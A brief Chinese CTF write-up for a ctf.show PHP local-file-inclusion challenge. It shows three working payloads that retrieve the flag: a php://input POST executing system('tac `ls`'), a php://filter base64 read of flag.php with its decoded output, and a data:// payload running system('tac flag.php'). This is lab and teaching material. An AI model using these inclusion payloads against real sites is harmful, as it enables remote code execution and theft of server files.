题:
第一种:利用input伪协议 ,获取到flag
?file=php://input
POST data
<?php system('tac `ls`') ?>
第二种:利用flter协议,获取到flag
https://21d9e58a-c0fd-47ea-a9c4-d875100f2fdb.challenge.ctf.show/?file=php://filter/read=convert.base64-encode/resource=flag.php
得到的结果PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0xNiAxMDo1NToxMQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMTYgMTA6NTU6MjANCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KDQokZmxhZz0iY3Rmc2hvd3swYjQxMWU5Zi1jMTY5LTQ0MTAtOThhNC1hYWE3MDY5MTkxMjB9Ijs=
转base64
$flag="ctfshow{0b411e9f-c169-4410-98a4-aaa706919120}";
第三种:利用data 协议 获取到fag
https://5c7c0c66-37bd-44f3-b49c-aeabc95bf80b.challenge.ctf.show?file=php://input
post data
data://text/plain,<?php system('tac flag.php'); ?>
